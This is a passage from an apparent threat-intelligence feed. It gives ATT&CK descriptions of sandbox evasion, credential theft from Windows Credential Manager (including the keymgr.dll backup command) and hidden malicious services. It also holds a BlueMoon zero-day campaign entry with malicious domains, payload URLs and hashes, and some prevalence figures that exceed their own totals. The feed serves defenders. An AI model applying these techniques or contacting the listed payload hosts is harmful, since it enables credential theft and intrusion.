use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)", "created_on": "2020-12-12T03:00:42.000Z", "name": "Time Based Evasion"}, {"id": "9ce70935-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", "created_on": "2020-11-20T03:00:57.000Z", "name": "Web Protocols"}, {"id": "9cc48241-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.", "created_on": "2020-11-20T03:00:57.000Z", "name": "Windows Command Shell"}, {"id": "f5bb6633-791c-4ae1-b275-49f5d3120d0e", "category": "mitre-attack-pattern", "description": "Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)\n\nThe Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.\n\nCredential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\`. The encryption key can be found in a file named <code>Policy.vpol</code>, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)\n\nAdversaries may list credentials managed by the Windows Credential Manager through several mechanisms. <code>vaultcmd.exe</code> is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as <code>CredEnumerateA</code>, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nAdversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running <code>rundll32.exe keymgr.dll KRShowKeyMgr</code> then selecting the \u201cBack up...\u201d button on the \u201cStored User Names and Passwords\u201d GUI.\n\nPassword recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)", "created_on": "2021-07-22T15:52:33.000Z", "name": "Windows Credential Manager"}, {"id": "9cce2259-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.\n\nAdversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. \n\nAdversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as \"Bring Your Own Vulnerable Driver\" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)\n\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002).\n\nTo make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create \u2018hidden\u2019 services (i.e., [Hide Artifacts](https://attack.mitre.org/techniques/T1564)), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.(Citation: SANS 1)(Citation: SANS 2)", "created_on": "2020-11-20T03:00:57.000Z", "name": "Windows Service"}, {"id": "2c1727e3-78aa-4da2-b822-aa9edb8ae1c0", "category": "trellix-tool", "description": "The Windows SDK contains a command-line utility, Sc.exe, that can be used to control a service. Its commands correspond to the functions provided by the SCM.\r\n\r\nSource: Microsoft", "created_on": "2021-08-31T21:00:42.000Z", "name": "Windows Service Configuration Tool"}, {"id": "bdfc9c30-d16c-4a83-887d-6b8f06cba8f4", "category": "trellix-tool", "description": "WinRing0 and WinRing0x64 are legitimate open-source kernel-mode drivers from the OpenLibSys project, granting user-mode applications Ring 0 access to system hardware, including CPU Model Specific Registers (MSRs), I/O ports, and memory. Widely used in system monitoring and overclocking tools, and has been frequently abused by malware operators. Threat actors can deploy kernel mode driver alongside XMRig to modify CPU prefetcher and L3 cache behavior via MSR writes, significantly boosting Monero RandomX mining performance on a compromised hosts, bypassing OS restrictions.", "created_on": "2026-04-08T16:17:18.000Z", "name": "WinRing0"}, {"id": "4b901f75-ba6d-11eb-9d72-02d538d9640e", "category": "trellix-tool", "description": "XMRig is an open-source and highly efficient cryptocurrency miner designed to mine Monero and other digital currencies using computer processors across various operating systems. The software is a completely legitimate tool built to optimize proof-of-work mining on standard computer hardware by supporting multiple mining algorithms simultaneously. However, because it is open-source and exceptionally effective at utilizing central processing unit resources, cybercriminals frequently exploit and repurpose it to execute unauthorized cryptojacking attacks on compromised devices.", "created_on": "2021-05-21T19:46:54.000Z", "name": "XMRig"}], "metrics": [{"date": "2026-09-10", "nodes": 17.1, "events": 52.78, "sectors": [{"sector": "Various", "affected": 143.8, "events": 443.87, "total": 1000000}], "countries": [{"iso_code": "FR", "affected": 27.57, "events": 58.39, "total": 1000000}, {"iso_code": "US", "affected": 14.18, "events": 75.69, "total": 1000000}, {"iso_code": "AT", "affected": 65.64, "events": 153.15, "total": 1000000}, {"iso_code": "IT", "affected": 157.91, "events": 497.24, "total": 1000000}, {"iso_code": "CZ", "affected": 94.2, "events": 134.57, "total": 1000000}, {"iso_code": "DE", "affected": 2.08, "events": 4.67, "total": 1000000}, {"iso_code": "ES", "affected": 21.75, "events": 48.93, "total": 1000000}, {"iso_code": "HU", "affected": 99.83, "events": 366.03, "total": 1000000}, {"iso_code": "SK", "affected": 532.41, "events": 1730.33, "total": 1000000}, {"iso_code": "TR", "affected": 24.01, "events": 43.21, "total": 1000000}, {"iso_code": "GB", "affected": 37.5, "events": 51.92, "total": 1000000}, {"iso_code": "VN", "affected": 14.59, "events": 18.24, "total": 1000000}, {"iso_code": "BR", "affected": 8.4, "events": 8.4, "total": 1000000}, {"iso_code": "CA", "affected": 7.53, "events": 7.53, "total": 1000000}, {"iso_code": "CH", "affected": 40.54, "events": 222.94, "total": 1000000}, {"iso_code": "GR", "affected": 288.21, "events": 864.64, "total": 1000000}, {"iso_code": "GT", "affected": 461.04, "events": 461.04, "total": 1000000}, {"iso_code": "NG", "affected": 112.7, "events": 112.7, "total": 1000000}, {"iso_code": "PL", "affected": 36.18, "events": 72.37, "total": 1000000}, {"iso_code": "SE", "affected": 19.45, "events": 106.99, "total": 1000000}, {"iso_code": "TH", "affected": 32.4, "events": 64.79, "total": 1000000}, {"iso_code": "BE", "affected": 15.7, "events": 15.7, "total": 1000000}, {"iso_code": "CN", "affected": 3.23, "events": 6.46, "total": 1000000}, {"iso_code": "CO", "affected": 89.82, "events": 159.69, "total": 1000000}, {"iso_code": "DO", "affected": 34.71, "events": 34.71, "total": 1000000}, {"iso_code": "FI", "affected": 19.15, "events": 19.15, "total": 1000000}, {"iso_code": "ID", "affected": 11.73, "events": 35.2, "total": 1000000}, {"iso_code": "IN", "affected": 1.67, "events": 1.67, "total": 1000000}, {"iso_code": "KR", "affected": 60.49, "events": 60.49, "total": 1000000}, {"iso_code": "NL", "affected": 8.08, "events": 8.08, "total": 1000000}, {"iso_code": "NO", "affected": 184.57, "events": 738.28, "total": 1000000}, {"iso_code": "SA", "affected": 12.36, "events": 12.36, "total": 1000000}, {"iso_code": "SG", "affected": 6.44, "events": 6.44, "total": 1000000}, {"iso_code": "SV", "affected": 159.64, "events": 159.64, "total": 1000000}, {"iso_code": "TW", "affected": 41.61, "events": 41.61, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-11", "nodes": 9.45, "events": 24.6, "sectors": [{"sector": "Unknown", "affected": 79.45, "events": 206.83, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 6.95, "events": 21.66, "total": 1000000}, {"iso_code": "IT", "affected": 87.35, "events": 194.86, "total": 1000000}, {"iso_code": "CH", "affected": 60.8, "events": 121.61, "total": 1000000}, {"iso_code": "FR", "affected": 14.6, "events": 53.53, "total": 1000000}, {"iso_code": "PL", "affected": 54.28, "events": 81.41, "total": 1000000}, {"iso_code": "AT", "affected": 32.82, "events": 43.76, "total": 1000000}, {"iso_code": "CZ", "affected": 53.83, "events": 94.2, "total": 1000000}, {"iso_code": "VN", "affected": 10.94, "events": 14.59, "total": 1000000}, {"iso_code": "BE", "affected": 47.11, "events": 78.52, "total": 1000000}, {"iso_code": "ES", "affected": 10.87, "events": 32.62, "total": 1000000}, {"iso_code": "GR", "affected": 192.14, "events": 192.14, "total": 1000000}, {"iso_code": "IN", "affected": 3.33, "events": 3.33, "total": 1000000}, {"iso_code": "SV", "affected": 319.28, "events": 478.93, "total": 1000000}, {"iso_code": "TH", "affected": 32.4, "events": 48.59, "total": 1000000}, {"iso_code": "TR", "affected": 14.4, "events": 52.81, "total": 1000000}, {"iso_code": "TW", "affected": 104.01, "events": 353.65, "total": 1000000}, {"iso_code": "GB", "affected": 8.65, "events": 17.31, "total": 1000000}, {"iso_code": "DE", "affected": 0.52, "events": 0.52, "total": 1000000}, {"iso_code": "DK", "affected": 88.89, "events": 88.89, "total": 1000000}, {"iso_code": "GT", "affected": 230.52, "events": 230.52, "total": 1000000}, {"iso_code": "HU", "affected": 33.28, "events": 266.21, "total": 1000000}, {"iso_code": "KR", "affected": 60.49, "events": 725.86, "total": 1000000}, {"iso_code": "NG", "affected": 56.35, "events": 56.35, "total": 1000000}, {"iso_code": "NL", "affected": 8.08, "events": 8.08, "total": 1000000}, {"iso_code": "SE", "affected": 9.73, "events": 116.71, "total": 1000000}, {"iso_code": "SG", "affected": 6.44, "events": 6.44, "total": 1000000}, {"iso_code": "SK", "affected": 133.1, "events": 532.41, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-12", "nodes": 3.36, "events": 8.43, "sectors": [{"sector": "Unknown", "affected": 26.26, "events": 61.72, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 125000, "events": 500000, "total": 1000000}, {"sector": "Government", "affected": 0.82, "events": 4.11, "total": 1000000}], "countries": [{"iso_code": "IT", "affected": 26.88, "events": 70.55, "total": 1000000}, {"iso_code": "US", "affected": 2.41, "events": 10.43, "total": 1000000}, {"iso_code": "CZ", "affected": 53.83, "events": 53.83, "total": 1000000}, {"iso_code": "PL", "affected": 27.14, "events": 72.37, "total": 1000000}, {"iso_code": "AT", "affected": 21.88, "events": 21.88, "total": 1000000}, {"iso_code": "TR", "affected": 19.2, "events": 86.42, "total": 1000000}, {"iso_code": "TW", "affected": 41.61, "events": 41.61, "total": 1000000}, {"iso_code": "GB", "affected": 5.77, "events": 11.54, "total": 1000000}, {"iso_code": "BR", "affected": 2.8, "events": 2.8, "total": 1000000}, {"iso_code": "CH", "affected": 10.13, "events": 10.13, "total": 1000000}, {"iso_code": "DE", "affected": 0.52, "events": 0.52, "total": 1000000}, {"iso_code": "ES", "affected": 5.44, "events": 10.87, "total": 1000000}, {"iso_code": "FR", "affected": 1.62, "events": 1.62, "total": 1000000}, {"iso_code": "GT", "affected": 230.52, "events": 230.52, "total": 1000000}, {"iso_code": "IN", "affected": 1.67, "events": 1.67, "total": 1000000}, {"iso_code": "LB", "affected": 264.62, "events": 264.62, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-13", "nodes": 2.89, "events": 7.42, "sectors": [{"sector": "Unknown", "affected": 24.29, "events": 62.38, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 2.14, "events": 10.16, "total": 1000000}, {"iso_code": "IT", "affected": 20.16, "events": 50.4, "total": 1000000}, {"iso_code": "PL", "affected": 27.14, "events": 108.55, "total": 1000000}, {"iso_code": "AT", "affected": 21.88, "events": 21.88, "total": 1000000}, {"iso_code": "CZ", "affected": 26.91, "events": 26.91, "total": 1000000}, {"iso_code": "ES", "affected": 10.87, "events": 21.75, "total": 1000000}, {"iso_code": "BR", "affected": 2.8, "events": 2.8, "total": 1000000}, {"iso_code": "CH", "affected": 10.13, "events": 10.13, "total": 1000000}, {"iso_code": "DE", "affected": 0.52, "events": 0.52, "total": 1000000}, {"iso_code": "FR", "affected": 1.62, "events": 1.62, "total": 1000000}, {"iso_code": "GT", "affected": 230.52, "events": 230.52, "total": 1000000}, {"iso_code": "NG", "affected": 56.35, "events": 56.35, "total": 1000000}, {"iso_code": "NL", "affected": 8.08, "events": 8.08, "total": 1000000}, {"iso_code": "TR", "affected": 9.6, "events": 24.01, "total": 1000000}, {"iso_code": "TW", "affected": 20.8, "events": 20.8, "total": 1000000}, {"iso_code": "GB", "affected": 2.88, "events": 2.88, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-14", "nodes": 11.09, "events": 27.88, "sectors": [{"sector": "Unknown", "affected": 91.93, "events": 230.47, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 125000, "events": 500000, "total": 1000000}, {"sector": "Government", "affected": 0.41, "events": 0.82, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 6.69, "events": 23.27, "total": 1000000}, {"iso_code": "DE", "affected": 6.23, "events": 11.93, "total": 1000000}, {"iso_code": "FR", "affected": 21.09, "events": 48.66, "total": 1000000}, {"iso_code": "IT", "affected": 134.39, "events": 342.69, "total": 1000000}, {"iso_code": "CZ", "affected": 67.29, "events": 94.2, "total": 1000000}, {"iso_code": "GB", "affected": 17.31, "events": 49.04, "total": 1000000}, {"iso_code": "AT", "affected": 32.82, "events": 65.64, "total": 1000000}, {"iso_code": "PL", "affected": 63.32, "events": 117.6, "total": 1000000}, {"iso_code": "TR", "affected": 14.4, "events": 43.21, "total": 1000000}, {"iso_code": "TW", "affected": 83.21, "events": 124.82, "total": 1000000}, {"iso_code": "ES", "affected": 16.31, "events": 27.18, "total": 1000000}, {"iso_code": "TH", "affected": 48.59, "events": 129.58, "total": 1000000}, {"iso_code": "CA", "affected": 3.76, "events": 22.58, "total": 1000000}, {"iso_code": "CH", "affected": 10.13, "events": 10.13, "total": 1000000}, {"iso_code": "CO", "affected": 9.98, "events": 39.92, "total": 1000000}, {"iso_code": "DK", "affected": 44.44, "events": 133.33, "total": 1000000}, {"iso_code": "FI", "affected": 19.15, "events": 19.15, "total": 1000000}, {"iso_code": "GR", "affected": 96.07, "events": 288.21, "total": 1000000}, {"iso_code": "GT", "affected": 230.52, "events": 230.52, "total": 1000000}, {"iso_code": "HR", "affected": 62.52, "events": 125.05, "total": 1000000}, {"iso_code": "HU", "affected": 33.28, "events": 133.1, "total": 1000000}, {"iso_code": "NL", "affected": 8.08, "events": 8.08, "total": 1000000}, {"iso_code": "NO", "affected": 369.14, "events": 553.71, "total": 1000000}, {"iso_code": "SE", "affected": 9.73, "events": 68.08, "total": 1000000}, {"iso_code": "SG", "affected": 6.44, "events": 6.44, "total": 1000000}, {"iso_code": "SK", "affected": 133.1, "events": 133.1, "total": 1000000}, {"iso_code": "SV", "affected": 159.64, "events": 159.64, "total": 1000000}, {"iso_code": "VN", "affected": 3.65, "events": 14.59, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-15", "nodes": 9.14, "events": 22.18, "sectors": [{"sector": "Unknown", "affected": 76.82, "events": 186.48, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 5.35, "events": 21.93, "total": 1000000}, {"iso_code": "FR", "affected": 11.35, "events": 21.09, "total": 1000000}, {"iso_code": "IT", "affected": 97.43, "events": 231.82, "total": 1000000}, {"iso_code": "CZ", "affected": 40.37, "events": 40.37, "total": 1000000}, {"iso_code": "DE", "affected": 7.78, "events": 14.53, "total": 1000000}, {"iso_code": "ES", "affected": 21.75, "events": 48.93, "total": 1000000}, {"iso_code": "TW", "affected": 104.01, "events": 249.64, "total": 1000000}, {"iso_code": "GB", "affected": 14.42, "events": 25.96, "total": 1000000}, {"iso_code": "AT", "affected": 21.88, "events": 21.88, "total": 1000000}, {"iso_code": "BE", "affected": 31.41, "events": 47.11, "total": 1000000}, {"iso_code": "CH", "affected": 40.54, "events": 91.2, "total": 1000000}, {"iso_code": "CO", "affected": 19.96, "events": 59.88, "total": 1000000}, {"iso_code": "GR", "affected": 288.21, "events": 672.49, "total": 1000000}, {"iso_code": "PL", "affected": 45.23, "events": 63.32, "total": 1000000}, {"iso_code": "SE", "affected": 19.45, "events": 87.54, "total": 1000000}, {"iso_code": "GT", "affected": 230.52, "events": 230.52, "total": 1000000}, {"iso_code": "IN", "affected": 1.67, "events": 3.33, "total": 1000000}, {"iso_code": "NG", "affected": 56.35, "events": 56.35, "total": 1000000}, {"iso_code": "PT", "affected": 51.45, "events": 102.89, "total": 1000000}, {"iso_code": "TH", "affected": 16.2, "events": 32.4, "total": 1000000}, {"iso_code": "VN", "affected": 7.3, "events": 21.89, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-16", "nodes": 5.7, "events": 14.52, "sectors": [{"sector": "Various", "affected": 39.43, "events": 100.47, "total": 1000000}], "countries": [{"iso_code": "FR", "affected": 9.73, "events": 25.95, "total": 1000000}, {"iso_code": "IT", "affected": 70.55, "events": 235.18, "total": 1000000}, {"iso_code": "US", "affected": 2.41, "events": 9.9, "total": 1000000}, {"iso_code": "CZ", "affected": 26.91, "events": 40.37, "total": 1000000}, {"iso_code": "DE", "affected": 5.71, "events": 6.74, "total": 1000000}, {"iso_code": "ES", "affected": 16.31, "events": 32.62, "total": 1000000}, {"iso_code": "PL", "affected": 27.14, "events": 63.32, "total": 1000000}, {"iso_code": "TH", "affected": 32.4, "events": 32.4, "total": 1000000}, {"iso_code": "TW", "affected": 62.41, "events": 83.21, "total": 1000000}, {"iso_code": "VN", "affected": 10.94, "events": 25.53, "total": 1000000}, {"iso_code": "AT", "affected": 10.94, "events": 21.88, "total": 1000000}, {"iso_code": "HU", "affected": 33.28, "events": 133.1, "total": 1000000}, {"iso_code": "ID", "affected": 11.73, "events": 11.73, "total": 1000000}, {"iso_code": "KZ", "affected": 96.04, "events": 96.04, "total": 1000000}, {"iso_code": "PH", "affected": 25.85, "events": 25.85, "total": 1000000}, {"iso_code": "SA", "affected": 6.18, "events": 6.18, "total": 1000000}, {"iso_code": "SE", "affected": 9.73, "events": 68.08, "total": 1000000}, {"iso_code": "SK", "affected": 133.1, "events": 133.1, "total": 1000000}, {"iso_code": "TR", "affected": 4.8, "events": 9.6, "total": 1000000}, {"iso_code": "GB", "affected": 2.88, "events": 2.88, "total": 1000000}], "countriesTotalDevices": 1000000}]}, {"id": "7182a189-78c5-4e98-8493-1b90dde1f100", "threat_level_id": 2, "description": "Proofpoint identified four espionage-motivated threat actors employing the BlueMoon exploit kit, which chains Chrome browser vulnerabilities with a Windows kernel zero-day. The first observed user was China-aligned TA412 on 28 August 2026, followed rapidly by several other suspected China-nexus clusters. The exploit chain targets CVE-2026-85046 (V8 type-confusion), a V8 sandbox escape, and CVE-2026-85880 (Windows LPE affecting older builds). Both V8 vulnerabilities were patch-gap zero-days\u2014fixed in upstream Chromium source code but not yet released in stable browsers during the attack window. The kit was delivered via targeted spearphishing campaigns with malicious links to actor-controlled domains hosting the exploits. Default exploitation resulted in a curl command downloading and executing actor-provided payloads, including the GemStone browser extension (TA412), ShadowPad backdoor (UNK_LateNight), and custom malware (UNK_QuietRacket and UNK_DoubleCheck). Proofpoint observed indicators consistent with potential AI-assisted development, including extensive diagnostic logging, markdown handover document references, and detailed iterative debugging comments. The rapid adoption across multiple actors likely reflects rushed deployment ahead of anticipated patches, with infrastructure created immediately before campaigns.\r\n\r\nThe Trellix Threat Intelligence Group (TIG) gathers and analyzes information from multiple open and closed sources before disseminating intelligence reports. This campaign was researched by Proofpoint and shared publicly https://www.proofpoint.com/us/blog/threat-insight/once-bluemoon-multiple-state-aligned-threat-actors-rapidly-adopt-novel-exploit", "kb_article_link": null, "coverage": null, "external_analysis": {"links": ["https://www.proofpoint.com/us/blog/threat-insight/once-bluemoon-multiple-state-aligned-threat-actors-rapidly-adopt-novel-exploit"]}, "is_coat": 0, "name": "Multiple State Actors Rapidly Adopt BlueMoon Chrome Windows Zero Day Exploits", "prevalence": {"countries": [{"iso_code": "US", "affected": 14.18, "events": 352.25, "total": 1000000}, {"iso_code": "TR", "affected": 33.61, "events": 105.62, "total": 1000000}, {"iso_code": "DE", "affected": 0.52, "events": 0.52, "total": 1000000}, {"iso_code": "IT", "affected": 3.36, "events": 3.36, "total": 1000000}, {"iso_code": "VE", "affected": 38.3, "events": 38.3, "total": 1000000}, {"iso_code": "VN", "affected": 3.65, "events": 3.65, "total": 1000000}], "events": 110.49, "nodes": 5, "sectors": [{"sector": "Unknown", "affected": 38.08, "events": 915.32, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 375000, "events": 1500000, "total": 1000000}, {"sector": "Government", "affected": 1.23, "events": 3.7, "total": 1000000}], "countriesTotalDevices": 1000000}, "iocs": [{"type": "ip", "value": "79.133.56.90"}, {"type": "domain", "value": "secboxes.com"}, {"type": "domain", "value": "recommendation-letter.secboxes.com"}, {"type": "domain", "value": "asianstudies.secboxes.com"}, {"type": "domain", "value": "materials-project.secboxes.com"}, {"type": "domain", "value": "project.secboxes.com"}, {"type": "domain", "value": "download.secboxes.com"}, {"type": "domain", "value": "api-prod.secboxes.com"}, {"type": "domain", "value": "msbenefit.com"}, {"type": "domain", "value": "evidence.msbenefit.com"}, {"type": "domain", "value": "zki0y83.msbenefit.com"}, {"type": "domain", "value": "attcdn.com"}, {"type": "domain", "value": "data.attcdn.com"}, {"type": "domain", "value": "extension-management-portal.centerfjdr658.workers.dev"}, {"type": "domain", "value": "extension-management-portal.kmjukilo-lkjh.workers.dev"}, {"type": "domain", "value": "airproducts.ink"}, {"type": "domain", "value": "precipart.ink"}, {"type": "domain", "value": "epsilonsystems.net"}, {"type": "domain", "value": "rocketlabusa.ink"}, {"type": "domain", "value": "spectrolab.fit"}, {"type": "domain", "value": "checrity.com"}, {"type": "domain", "value": "ms.checrity.com"}, {"type": "domain", "value": "aurexdefense.online"}, {"type": "domain", "value": "cyclokinetics.online"}, {"type": "domain", "value": "sncorp.fit"}, {"type": "domain", "value": "tcomlp.online"}, {"type": "domain", "value": "bosch-sensortec.site"}, {"type": "domain", "value": "smxtech.xyz"}, {"type": "domain", "value": "lindes.ink"}, {"type": "domain", "value": "silvustechnologies.online"}, {"type": "domain", "value": "worldview.fit"}, {"type": "domain", "value": "emcore.ink"}, {"type": "domain", "value": "airindia.fit"}, {"type": "domain", "value": "airliquide.lol"}, {"type": "domain", "value": "apollohospitals.fit"}, {"type": "domain", "value": "haloengines.net"}, {"type": "domain", "value": "jetoptera.co"}, {"type": "domain", "value": "mailtbox.workers.dev"}, {"type": "domain", "value": "vncdc.mailtbox.workers.dev"}, {"type": "domain", "value": "brianwilli.com"}, {"type": "domain", "value": "homepage.brianwilli.com"}, {"type": "domain", "value": "1a062f4982564d6d19a76884ce8bcbb6.r2.cloudflarestorage.com"}, {"type": "domain", "value": "fracons.com"}, {"type": "domain", "value": "yhv41nji.workers.dev"}, {"type": "domain", "value": "joinmacket.com"}, {"type": "domain", "value": "wcce.joinmacket.com"}, {"type": "domain", "value": "openlumakora.com"}, {"type": "domain", "value": "publish.openlumakora.com"}, {"type": "domain", "value": "eduac.workers.dev"}, {"type": "domain", "value": "app.eduac.workers.dev"}, {"type": "domain", "value": "daoahueb.workers.dev"}, {"type": "domain", "value": "small-union-7018.daoahueb.workers.dev"}, {"type": "domain", "value": "snowy-block-ae0a.daoahueb.workers.dev"}, {"type": "domain", "value": "royal-surf-a2e2.daoahueb.workers.dev"}, {"type": "domain", "value": "elixnovorem.com"}, {"type": "domain", "value": "dns.elixnovorem.com"}, {"type": "domain", "value": "getaiexo.com"}, {"type": "domain", "value": "dns.getaiexo.com"}, {"type": "domain", "value": "velodynaity.com"}, {"type": "domain", "value": "v93xdd5g.workers.dev"}, {"type": "domain", "value": "black-flower-9250.v93xdd5g.workers.dev"}, {"type": "url", "value": "https://project.secboxes.com/ChromeUpdate.exe"}, {"type": "url", "value": "https://recommendation-letter.secboxes.com/ChromeUpdate.exe"}, {"type": "url", "value": "https://download.secboxes.com:443/dist.zip"}, {"type": "url", "value": "https://api-prod.secboxes.com:443/download"}, {"type": "url", "value": "https://evidence.msbenefit.com/msgbox.exe"}, {"type": "url", "value": "https://zki0y83.msbenefit.com:443/feed"}, {"type": "url", "value": "https://homepage.brianwilli.com/d/wint.exe"}, {"type": "url", "value": "https://homepage.brianwilli.com/d/calibre-launcher.dll"}, {"type": "url", "value": "https://homepage.brianwilli.com/d/85rY.dat"}, {"type": "url", "value": "https://homepage.brianwilli.com/d/SysPr.prx"}, {"type": "url", "value": "https://1a062f4982564d6d19a76884ce8bcbb6.r2.cloudflarestorage.com/datago/krita.exe"}, {"type": "url", "value": "https://1a062f4982564d6d19a76884ce8bcbb6.r2.cloudflarestorage.com/datago/krita.dll"}, {"type": "url", "value": "https://1a062f4982564d6d19a76884ce8bcbb6.r2.cloudflarestorage.com/datago/SysPr.prx"}, {"type": "url", "value": "https://app.eduac.workers.dev/Service"}, {"type": "url", "value": "https://app.eduac.workers.dev/Updateac"}, {"type": "url", "value": "https://small-union-7018.daoahueb.workers.dev/"}, {"type": "url", "value": "https://snowy-block-ae0a.daoahueb.workers.dev/"}, {"type": "mutex", "value": "Dataupcheckinfo"}, {"type": "email", "value": "zfg.rc.420@gmail.com"}, {"type": "email", "value": "laylowthiago@gmail.com"}, {"type": "email", "value": "susan.thomas.90@outlook.com"}, {"type": "email", "value": "mariedubois1917@outlook.com"}, {"type": "email", "value": "reallifetalktv2@gmail.com"}, {"type": "email", "value": "faizus123@outlook.com"}, {"type": "email", "value": "firda.kemkes@outlook.com"}, {"type": "email", "value": "faizus123@proton.me"}, {"type": "email", "value": "dewiinpermata@outlook.com"}, {"type": "email", "value": "radhikadas07@outlook.com"}, {"type": "email", "value": "jeannifer.suryajaya@outlook.com"}, {"type": "email", "value": "siti.nurhaliza2026@outlook.com"}, {"type": "email", "value": "ditjenpajakri2026@outlook.com"}, {"type": "hostname", "value": "dns.velodynaity.com"}, {"type": "sha256", "value": "779b3e1a470e589d492b99154ba11622fbaebb19b3de694f660c725411b7096d"}, {"type": "sha256", "value": "ff1b49aaec994f4c11f2c9331e739abb4bc3d6abf66ec50ce99709fba35d782b"}, {"type": "md5", "value": "1bbd9d51ec9a01892ad0966d04b6d3ed"}, {"type": "sha1", "value": "a470ca129fd5ea1de842d82ac90b52227e15dcd3"}, {"type": "sha256", "value": "7d6f6dcb17a423bdd7715f8a4e34f2939501a761bc9bf7aa005f805ef1f82288"}, {"type": "md5", "value": "c0bb1be1997085f666f4cf0509648859"}, {"type": "sha1", "value": "1a1c3350fc64b0b77623683bc6757b8fecb3d6a5"}, {"type": "sha256", "value": "e950d03c58d49e28e31df8afeefca1f3b3d2cd6b697c40adfee1a4f6fe18f004"}, {"type": "md5", "value": "775350a89885268a4ddbc1693620f62c"}, {"type": "sha1", "value": "8894ca6fd3fe082e721a8690b8125aaf0fad64ae"}, {"type": "sha256", "value": "353b5bd2780c1b0c07c1283d83cf16cf1e9ec226c17b2d09d56848893f9d98ee"}, {"type": "sha256", "value": "a4a6a04d85eca8d584d939d2437c85a4f291207d8042f2ec002838e336b72ef5"}, {"type": "md5", "value": "6219d9dda3d6f860a82faf539bfc4377"}, {"type": "sha1", "value": 